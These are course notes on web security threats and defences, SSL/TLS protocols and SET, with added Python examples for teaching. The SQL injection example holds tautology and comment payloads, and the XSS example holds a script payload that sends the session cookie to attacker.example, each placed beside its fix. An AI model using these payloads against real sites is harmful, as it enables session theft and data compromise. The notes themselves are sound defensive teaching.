Network Security Unit 4

Web Security is essential for protecting against online threats and managing internet usage, focusing on safeguarding data during client-server interactions. Key threats include SQL Injection, Cross-site Scripting (XSS), and Ransomware, while security measures involve keeping software updated, validating data, and using strong passwords. SSL and TLS protocols ensure secure data transmission through encryption, authentication, and integrity, while the SET protocol secures electronic transactions by maintaining confidentiality and integrity of payment information.


Unit 4: Web Security

What is Web Security?

Web security is the set of controls that protect websites, web applications and their users from online
threats: blocking access to malicious sites, stopping web-based attacks, and governing how staff use the
internet. It matters because a public website is exposed to attack continuously. For example, when data is
transferred between a client and a server, protecting that data in transit (against eavesdropping and
tampering) is a web security problem.
What is a Security Threat

A threat is a possible event that can damage or harm an information system; a security threat is a risk
that can harm computer systems and organisations. Any website an individual or organisation puts online is
exposed to attack. Attacks mainly aim to steal, alter or destroy personal and confidential information,
consume storage and other resources, or gain unauthorised access to passwords and accounts. A vulnerable
website therefore risks having its data stolen or altered, its users' confidential information read, and its
credentials compromised.
Top Web Security Threats
● Cross-site scripting (XSS)
● SQL Injection
● Phishing
● Ransomware
● Code Injection
● Viruses and worms
● Spyware
● Denial of Service
Security Considerations
● Updated Software: Always keep software up to date. Attackers know about vulnerabilities in
particular software versions, often caused by bugs, and use them to compromise systems and steal personal
data. An outdated version can therefore become the attacker's way into your network. Vendors fix
vulnerabilities as they become known, but the fix only protects you once it is installed, so keeping
software patched is mandatory and plays an important role in keeping personal data secure.
● Beware of SQL Injection: SQL injection is an attempt to manipulate your data or your database by
inserting malicious SQL into a query. For example, an attacker can submit input to your website that is
concatenated into a query string; when the query executes, the injected SQL can alter tables, modify or
delete data, or retrieve information the attacker should never see. The defence is to never build queries by
string concatenation with untrusted input: use parameterised queries (prepared statements) so that input
is always treated as data, never as SQL.
● Cross-Site Scripting (XSS): XSS allows an attacker to inject client-side script into web pages, for
example through a submitted form whose contents are later displayed to other users. The term describes a
class of attacks in which an attacker injects client-side scripts into other users' browsers through a
website. Because the injected code arrives from the site itself, the browser trusts it as the site's own
code, so it can do things like send the user's session cookie to the attacker. The defence is to encode
output for the context it is placed in (HTML text, attribute, URL) so that user data is rendered as text
rather than executed.
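As an added example (not code from the notes), the SQL injection described above in Python with the standard library's sqlite3 module: the vulnerable function builds the query by string concatenation, the safe one passes the username as a bound parameter. The table contents and the attacker payloads are constructed for the example.

```python
"""SQL injection: string-built query beside its parameterised replacement."""
import sqlite3


def make_db():
    """In-memory database with a constructed users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'h1'), ('bob', 'h2')")
    return db


def find_user_vulnerable(db, username):
    # Untrusted input is pasted into the SQL text, so a quote in the input
    # ends the string literal and the rest is parsed as SQL.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' ORDER BY username")
    return [row[0] for row in db.execute(query)]


def find_user_safe(db, username):
    # The driver sends the statement and the value separately; the value is
    # never parsed as SQL, whatever characters it contains.
    query = "SELECT username FROM users WHERE username = ? ORDER BY username"
    return [row[0] for row in db.execute(query, (username,))]


# Constructed attacker inputs: the first makes the WHERE clause always true,
# the second uses an SQL comment to discard everything after the username.
PAYLOAD_TAUTOLOGY = "x' OR '1'='1"
PAYLOAD_COMMENT = "alice' --"

if __name__ == "__main__":
    db = make_db()
    for payload in (PAYLOAD_TAUTOLOGY, PAYLOAD_COMMENT):
        print(repr(payload), "vulnerable:", find_user_vulnerable(db, payload),
              "safe:", find_user_safe(db, payload))
```

With the tautology payload the vulnerable query returns every user; the parameterised query returns nothing because no username literally equals the payload string.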
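As an added example of the XSS point above (not code from the notes), a server-side rendering function that interpolates a user comment straight into HTML beside one that HTML-encodes it, plus a link renderer showing that encoding alone does not protect an href attribute. The payload and the host name attacker.example are constructed for the example.

```python
"""Reflected/stored XSS: unescaped rendering beside context-aware encoding."""
import html
from urllib.parse import urlsplit


def render_comment_vulnerable(author, comment):
    # Attacker-controlled text goes into the page verbatim, so any <script>
    # it contains runs with the site's origin and can read document.cookie.
    return f"<p class='comment'><b>{author}</b>: {comment}</p>"


def render_comment_safe(author, comment):
    # html.escape turns < > & " ' into entities; the browser shows them as text.
    return (f"<p class='comment'><b>{html.escape(author)}</b>: "
            f"{html.escape(comment)}</p>")


def render_link_safe(url, text):
    # Inside href, escaping is not enough: "javascript:alert(1)" has no angle
    # brackets to escape. Allow only http(s) URLs and render anything else as
    # plain text.
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return html.escape(text)
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text)}</a>'


# Constructed payload of the kind the notes describe: it ships the session
# cookie to an attacker-controlled host.
COOKIE_THIEF = ("<script>new Image().src="
                "'https://attacker.example/?c='+document.cookie</script>")

if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", COOKIE_THIEF))
    print(render_comment_safe("mallory", COOKIE_THIEF))
    print(render_link_safe("javascript:alert(1)", "click me"))
```

Output encoding is the primary control; marking the session cookie HttpOnly limits what a successful injection can steal, and a Content-Security-Policy that disallows inline script blocks this particular payload outright.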
Error Messages: Be careful about the information that error messages reveal. Errors are generated for
many reasons while users interact with a site, and the message shown to the user should not disclose
internal details (stack traces, SQL text, file paths) or help an attacker enumerate accounts. For example,
when a login attempt fails, the message should not tell the user which field was wrong, username or
password; use one generic message for both cases.

Data Validation: Data validation is the proper testing of any input supplied by a user or another
application. It prevents malformed or malicious data from entering the information system. Validation can
be performed on both the client side and the server side, but only server-side validation is a security
control: client-side checks improve the user experience and can be bypassed by anyone who sends requests
directly. Validate data whenever it is received from an outside party, especially from untrusted sources.

Password: A password is the first line of defence against unauthorised access to your device and
personal information, so it must be strong. Attackers commonly use tools that try passwords by brute
force, so passwords need to be long and hard to guess. A typical policy requires a minimum of eight
characters including uppercase letters, lowercase letters, numerals and special characters; length helps
more than character classes, and the server should store only a salted, slow hash of the password.
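The three points above (generic login errors, server-side validation, and password policy with hashed storage) combined into one registration-and-login routine, as an added example that is not code from the notes. The username pattern, the policy rules and the iteration count are choices made for the example; it uses only the Python standard library.

```python
"""Server-side validation, password policy, salted PBKDF2 hashes and a generic login error."""
import hashlib
import hmac
import os
import re

USERNAME_RE = re.compile(r"[a-z0-9_]{3,32}")           # assumed username format
PASSWORD_RULES = [(r"[A-Z]", "an uppercase letter"), (r"[a-z]", "a lowercase letter"),
                  (r"[0-9]", "a digit"), (r"[^A-Za-z0-9]", "a special character")]
GENERIC_ERROR = "Invalid username or password."          # same text for every failure
ITERATIONS = 100_000                                     # PBKDF2 work factor for the example


def password_problems(password):
    """Return the list of policy rules the password fails (empty means it passes)."""
    problems = []
    if len(password) < 8:
        problems.append("at least 8 characters")
    for pattern, description in PASSWORD_RULES:
        if not re.search(pattern, password):
            problems.append(description)
    return problems


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the stored record is (salt, hash), never the password."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


class UserStore:
    def __init__(self):
        self._users = {}

    def register(self, username, password):
        # Server-side validation: the client form may check this too, but cannot be trusted to.
        if not USERNAME_RE.fullmatch(username):
            return False, "Username must be 3-32 lowercase letters, digits or underscores."
        problems = password_problems(password)
        if problems:
            return False, "Password needs " + ", ".join(problems) + "."
        self._users[username] = hash_password(password)
        return True, "ok"

    def login(self, username, password):
        record = self._users.get(username)
        if record is None:
            # Hash anyway so an unknown username takes as long as a wrong password:
            # neither the message nor the timing says which field was wrong.
            hash_password(password, b"\x00" * 16)
            return False, GENERIC_ERROR
        salt, stored = record
        _, candidate = hash_password(password, salt)
        if not hmac.compare_digest(stored, candidate):
            return False, GENERIC_ERROR
        return True, "ok"


if __name__ == "__main__":
    store = UserStore()
    print(store.register("bob", "password"))
    print(store.register("bob", "Passw0rd!"))
    print(store.login("bob", "wrong"), store.login("nobody", "Passw0rd!"))
```

Registration returns specific policy feedback because the user is choosing a password; login returns only the generic message, since at that point any detail helps an attacker.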
Secure Socket Layer (SSL)

SSL, or Secure Sockets Layer, is an Internet security protocol that encrypts data in transit. It was
created by Netscape in 1995 to provide privacy, authentication and data integrity for online
communications. SSL is the predecessor of what we now call TLS (Transport Layer Security); every SSL
version is now deprecated, and the protocol actually negotiated on the web today is TLS, although the
name "SSL" persists in product names and certificates.

Websites using SSL/TLS have “HTTPS” in their URL instead of “HTTP.”

Working of SSL
● Encryption: SSL encrypts data transmitted over the web, ensuring privacy. Anyone who intercepts
the traffic sees only ciphertext that cannot be read without the session key.
● Authentication: SSL begins with a handshake in which the server (and optionally the client)
proves its identity with a certificate, so each party knows it is talking to who it expects.
● Data Integrity: SSL attaches a message authentication code (MAC) to each record, so any data that
has been altered in transit is detected and rejected; what the receiver accepts is exactly what the
sender transmitted.
Secure Socket Layer Protocols

SSL Record Protocol

SSL Record provides two services to an SSL connection:

● Confidentiality
● Message Integrity

The SSL Record Protocol processes outbound application data in a fixed order. The data is divided into
fragments of at most 16 KB (2^14 bytes). Each fragment is optionally compressed. A MAC (Message
Authentication Code), computed over the fragment with a hash algorithm such as SHA (Secure Hash
Algorithm) or MD5 under a secret key shared by the two sides, is appended. The fragment plus MAC is
then encrypted with the negotiated symmetric cipher, and finally the SSL record header (content type,
version, length) is prepended. The receiver reverses these steps and rejects any record whose MAC does
not verify.
Handshake Protocol
The Handshake Protocol is used to establish sessions. It allows the client and server to
authenticate each other and agree on keys by exchanging a series of messages. The handshake
proceeds in four phases.

● Phase-1: Client and server exchange hello messages (ClientHello, ServerHello). These carry the
protocol version, a random nonce, the session ID and the cipher suites each side supports; the
server selects the cipher suite that will be used.
● Phase-2: The server sends its certificate, a ServerKeyExchange message if the chosen key exchange
needs one, and optionally a CertificateRequest. The server ends the phase with ServerHelloDone.
● Phase-3: The client replies with its certificate if one was requested, the ClientKeyExchange
message (for RSA key exchange, the pre-master secret encrypted under the server's public key), and a
CertificateVerify if it sent a certificate.
● Phase-4: Each side sends ChangeCipherSpec, switches to the newly negotiated keys, and sends a
Finished message, which is a MAC over the whole handshake so that both sides can confirm it was not
tampered with. After this the handshake ends and application data can flow.
Change-Cipher Protocol
This protocol is carried by the SSL Record Protocol. Until the handshake has negotiated them, the new
security parameters (cipher, keys, MAC secret) are held in a pending state while the record layer
keeps using the current state.
The Change Cipher Spec protocol consists of a single message, 1 byte long, with only one possible value.
Its purpose is to cause the pending state to be copied into the current state, so that every record
that follows is protected with the newly agreed algorithms and keys.
Alert Protocol
This protocol is used to convey SSL-related alerts to the peer. Each alert message is 2 bytes: the
first byte is the level and the second byte is the description, which identifies the specific alert.

The level takes one of two values:

Warning (level = 1)
A warning does not by itself close the connection between sender and receiver. Examples (the
certificate alerts may also be sent at fatal level, depending on the implementation's policy):

● Bad Certificate: the received certificate is corrupt or its signature did not verify.
● No Certificate: no appropriate certificate is available (SSL 3.0 only; TLS sends an empty
certificate list instead).
● Certificate Expired: the certificate is past its validity period.
● Certificate Unknown: some other unspecified problem arose in processing the certificate,
rendering it unacceptable.
● Close Notify: the sender will not send any further messages on this connection. Each side sends
one before closing, so a stream that ends without it can be recognised as truncated.
● Unsupported Certificate: the type of certificate received is not supported.
● Certificate Revoked: the certificate appears on its issuer's revocation list.
Fatal Error (level = 2):
A fatal alert terminates the connection immediately. The session cannot be resumed, but a new
connection can be started. Examples:
● Handshake Failure: the sender is unable to negotiate an acceptable set of security parameters
from the options available.
● Decompression Failure: the decompression function received improper input.
● Illegal Parameter: a handshake field is out of range or inconsistent with other fields.
● Bad Record MAC: a record arrived with an incorrect MAC.
● Unexpected Message: an inappropriate message was received for the current state.
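A toy record layer covering both the SSL Record Protocol section above (fragment, compress, MAC, encrypt, prepend header, and the reverse on receipt) and the Alert Protocol just described (2-byte level/description, fatal alerts tearing the connection down). This is an added example written for these notes, not an SSL implementation: HMAC-SHA256 stands in for the SSL MAC and an HMAC-based counter keystream stands in for the negotiated cipher; the key values and the traffic are constructed. The content-type and alert-description codes are the real ones from the SSL 3.0 and TLS 1.0 specifications.

```python
"""Toy SSL record layer with alert handling (illustration only, not a real cipher)."""
import hashlib
import hmac
import struct
import zlib

MAX_FRAGMENT = 2 ** 14              # plaintext fragments are at most 16 KiB
CT_ALERT, CT_APPLICATION = 21, 23   # record-layer content types (RFC 6101 / RFC 2246)
VERSION = (3, 0)                    # SSL 3.0 version bytes on the wire
TAG_LEN = 32                        # HMAC-SHA256 output, stand-in for the SSL MAC
WARNING, FATAL = 1, 2               # alert levels

# Alert descriptions named in the notes, with their wire codes.
ALERTS = {0: "close_notify", 10: "unexpected_message", 20: "bad_record_mac",
          30: "decompression_failure", 40: "handshake_failure", 41: "no_certificate",
          42: "bad_certificate", 43: "unsupported_certificate", 44: "certificate_revoked",
          45: "certificate_expired", 46: "certificate_unknown", 47: "illegal_parameter"}


class AlertError(Exception):
    """Raised when a record must be rejected; carries the alert to send to the peer."""
    def __init__(self, level, desc):
        super().__init__(f"{'fatal' if level == FATAL else 'warning'}: {ALERTS.get(desc, desc)}")
        self.level, self.desc = level, desc


def _keystream(enc_key, seq, length):
    # Stand-in stream cipher: HMAC-SHA256 in counter mode keyed per record sequence number.
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(enc_key, struct.pack(">QI", seq, ctr), hashlib.sha256).digest()
        ctr += 1
    return out[:length]


def _mac(mac_key, seq, ctype, fragment):
    # The MAC binds the sequence number, content type, version and length as well as the data,
    # so replayed, reordered or retyped records fail verification.
    header = struct.pack(">QBBBH", seq, ctype, *VERSION, len(fragment))
    return hmac.new(mac_key, header + fragment, hashlib.sha256).digest()


def seal(keys, seq, ctype, data):
    """Fragment -> compress -> MAC -> encrypt -> prepend header. Returns (records, next_seq)."""
    mac_key, enc_key = keys
    records = []
    for off in range(0, max(len(data), 1), MAX_FRAGMENT):
        fragment = zlib.compress(data[off:off + MAX_FRAGMENT])
        body = fragment + _mac(mac_key, seq, ctype, fragment)
        ciphertext = bytes(a ^ b for a, b in zip(body, _keystream(enc_key, seq, len(body))))
        records.append(struct.pack(">BBBH", ctype, *VERSION, len(ciphertext)) + ciphertext)
        seq += 1
    return records, seq


def open_record(keys, seq, record):
    """Reverse of seal(): returns (ctype, plaintext) or raises AlertError."""
    mac_key, enc_key = keys
    if len(record) < 5:
        raise AlertError(FATAL, 10)                          # unexpected_message
    ctype, major, minor, length = struct.unpack(">BBBH", record[:5])
    if (major, minor) != VERSION or len(record) != 5 + length:
        raise AlertError(FATAL, 47)                          # illegal_parameter
    body = bytes(a ^ b for a, b in zip(record[5:], _keystream(enc_key, seq, length)))
    fragment, tag = body[:-TAG_LEN], body[-TAG_LEN:]
    if not hmac.compare_digest(tag, _mac(mac_key, seq, ctype, fragment)):
        raise AlertError(FATAL, 20)                          # bad_record_mac
    try:
        return ctype, zlib.decompress(fragment)
    except zlib.error:
        raise AlertError(FATAL, 30) from None                # decompression_failure


def handle_alert(payload):
    """An alert record carries 2 bytes, level then description. Returns (is_fatal, name)."""
    if len(payload) != 2:
        raise AlertError(FATAL, 10)                          # unexpected_message
    level, desc = payload
    return level == FATAL, ALERTS.get(desc, f"unknown({desc})")


if __name__ == "__main__":
    keys = (b"constructed-mac-key", b"constructed-enc-key")
    records, nxt = seal(keys, 0, CT_APPLICATION, b"GET / HTTP/1.0\r\n" * 2000)
    print(len(records), "records,", [len(r) for r in records], "bytes each")
    alert, _ = seal(keys, nxt, CT_ALERT, bytes([FATAL, 40]))
    print(handle_alert(open_record(keys, nxt, alert[0])[1]))
```

Note the order on receipt: the MAC is checked before decompression, so a tampered record is rejected with bad_record_mac before any attacker-controlled bytes reach the decompressor.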

Salient Features of Secure Socket Layer


● Because SSL sits above TCP and below the application, it can be embedded in a specific application
package (for example a browser or web server) and tailored to that application's needs, or provided
as a general service in the underlying protocol suite.
● Secure Socket Layer was originated by Netscape.
● SSL is designed to make use of TCP to provide a reliable end-to-end secure service.
● It is a two-layered protocol: the Record Protocol at the lower layer, and the Handshake, Change
Cipher Spec and Alert protocols above it.
SSL Certificate
An SSL (Secure Sockets Layer) certificate is a digital certificate used to secure and verify the identity of a
website or an online service. It is issued by a trusted third party called a Certificate Authority (CA), which
verifies the identity of the website or service before issuing the certificate. Despite the name, it is an
X.509 certificate and is what TLS uses today; the browser checks it against the CA certificates it trusts.
Transport Layer Security (TLS)
Transport Layer Security (TLS) is designed to provide security at the transport layer, between the
application and TCP. TLS was derived from the Secure Socket Layer (SSL) protocol; TLS 1.0 is essentially
SSL 3.1. TLS ensures that no third party can eavesdrop on or tamper with any message.

There are several benefits of TLS:

● Encryption:
TLS secures transmitted data using encryption.
● Interoperability:
TLS works with every mainstream web browser, operating system and web server.
● Algorithm flexibility:
TLS negotiates the authentication mechanism, encryption algorithm and hash algorithm (the cipher
suite) used for each session, so algorithms can be replaced as they weaken without changing the protocol.
● Ease of deployment:
TLS support is built into operating systems, web servers and application frameworks, so most
applications enable it through configuration rather than by writing cryptographic code.
● Ease of use:
Because TLS is implemented beneath the application layer, most of its operations are completely
invisible to the client.
Secure Electronic Transaction (SET) Protocol

Secure Electronic Transaction (SET) is a security protocol designed to ensure the security and
integrity of electronic transactions made with credit cards. SET is not itself a payment system; it is a
security protocol applied to payments made through existing card networks. It uses encryption and
hashing to secure credit-card payments over the Internet. Its development was supported by major
organisations including Visa and Mastercard, Microsoft, which contributed its Secure Transaction
Technology (STT), and Netscape, which contributed Secure Socket Layer (SSL) technology.

SET protocol restricts the revealing of credit card details to merchants thus keeping hackers and
thieves at bay. The SET protocol includes Certification Authorities for making use of standard
Digital Certificates like X.509 Certificate.
Requirements in SET: The SET protocol has several requirements to meet; the most important are:

● It has to provide mutual authentication: cardholder authentication, confirming that the customer is
the legitimate holder of the card, and merchant authentication.
● It has to keep the PI (Payment Information) and OI (Order Information) confidential through
appropriate encryption.
● It has to resist message modification: no change to the transmitted content may go undetected.
● It also needs to provide interoperability and make use of the best available security mechanisms.
Participants in SET: SET involves the same parties as any online card transaction:

1. Cardholder – the customer
2. Issuer – the customer's financial institution, which issued the card
3. Merchant
4. Acquirer – the merchant's financial institution
5. Certificate authority – an authority that follows defined standards and issues certificates (X.509v3)
to all the other participants.
SET functionalities:
● Provide Authentication
○ Merchant Authentication – To protect against fraudulent merchants, SET lets the customer verify
that the merchant has an established relationship with a financial institution. Standard X.509v3
certificates are used for this verification.
○ Customer / Cardholder Authentication – SET checks, again using X.509v3 certificates, that the
credit card is being used by its authorised holder.
● Provide Message Confidentiality: Confidentiality means preventing unintended parties from reading
the message being transferred. SET implements confidentiality with encryption; traditionally DES was
used as the symmetric cipher, with the DES key protected by RSA public-key encryption.
● Provide Message Integrity: SET detects message modification by means of digital signatures.
Messages are protected against unauthorised modification using RSA digital signatures over SHA-1
digests, and in some messages HMAC with SHA-1.
Dual Signature: The dual signature is a concept introduced with SET to link two pieces of
information meant for two different receivers:
Order Information (OI) for the merchant
Payment Information (PI) for the bank
The customer hashes each part, concatenates the two digests, hashes the result and signs that final digest
with its private key: DS = E_KRc[H(H(PI) || H(OI))]. The merchant receives OI, the digest of PI and DS, so it
can verify the signature without seeing the payment details; the bank receives PI, the digest of OI and DS,
so it can verify without seeing what was ordered. Neither party can substitute a different OI or PI
afterwards without invalidating the signature, and the customer cannot later deny that this OI and this PI
belonged to the same transaction.
